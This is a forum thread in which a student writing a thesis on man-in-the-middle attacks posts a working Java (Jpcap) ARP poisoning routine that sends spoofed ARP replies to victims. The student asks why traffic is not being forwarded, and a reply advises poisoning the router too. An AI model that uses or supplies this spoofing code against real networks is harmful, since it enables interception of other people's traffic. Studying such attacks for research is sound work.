Jump to content


Photo

Java ARP poisoning


  • Please log in to reply
1 reply to this topic

#1 Slacklabs

Slacklabs

    Young Padawan

  • Members
  • Pip
  • 1 posts

Posted 15 April 2010 - 05:34 PM

Hey,

I'm currently working on my thesis about MITM attacks. Now, I have to write my own tools, like my own small version of ettercap. I am using the Jpcap library in Java, and I'm currently writing my arp poisoning tool.

Problem:

Everything works without problems, the victims arp tables are getting poisoned, which currently are my gateway and a winXP client. The only problem which I'm currently experiencing, is that the traffic isn't being forwarded to its destination. Traffic forwarding has been enabled on the attacker's machine, so that shouldn't be the problem.

[codebox]private static void arpPoisonTarget1(JpcapCaptor captor, byte[] mac){
//create sender object which sends the packet
JpcapSender sender;
//initialisation ARPPacket
ARPPacket p;

//ARP pakket initialisation
ARPPacket arp;

////Ethernet pakket initialisation
EthernetPacket ether;

while (true) {
//receive ARP request and read it
p = (ARPPacket)captor.getPacket();

if (p != null && p.operation == 1) {
System.out.println(p.toString());

//source mac - adress spoofing
byte[] mac_fake = new byte[] { (byte) 254, (byte) 253,
(byte) 252, (byte) 240, (byte) 9, (byte) 40 };
//byte[] mac_fake = mac;

byte[] scrip = p.target_protoaddr;
byte[] mac_destination = new byte[]{ (byte) 0, (byte) 22, (byte) 200, (byte) 130, (byte) 123, (byte) 43 };

//get destination mac adres from the received packet
byte[] destip = p.sender_protoaddr;

//create new arp response packet
arp = new ARPPacket();

//set ARP packet parameters
arp.hardtype = ARPPacket.HARDTYPE_ETHER;
arp.prototype = ARPPacket.PROTOTYPE_IP;
arp.operation = ARPPacket.ARP_REPLY;

arp.hlen = 6;
arp.plen = 4;
arp.sender_hardaddr = mac_fake;
arp.sender_protoaddr = scrip;
arp.target_hardaddr = mac_destination;
arp.target_protoaddr = destip;

//create Ethernetpakket
ether = new EthernetPacket();
ether.frametype = EthernetPacket.ETHERTYPE_ARP;
ether.src_mac = mac;
ether.dst_mac = mac_destination;
arp.datalink = ether;

//get captor device instance to send the ARP packet
sender = captor.getJpcapSenderInstance();

sender.sendPacket(arp);
System.out.println("ARP poisoning packet sent " + arp.toString());
}
}
}[/codebox]

This is the arp poisoning method for target 1, and i'm having the same method for target 2, with different mac addressess.

#2 sagar

sagar

    Young Padawan

  • Members
  • Pip
  • 1 posts

Posted 10 September 2013 - 07:55 PM

In order for traffic being forwarded to its destination, you should arp poison the router also 

 






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users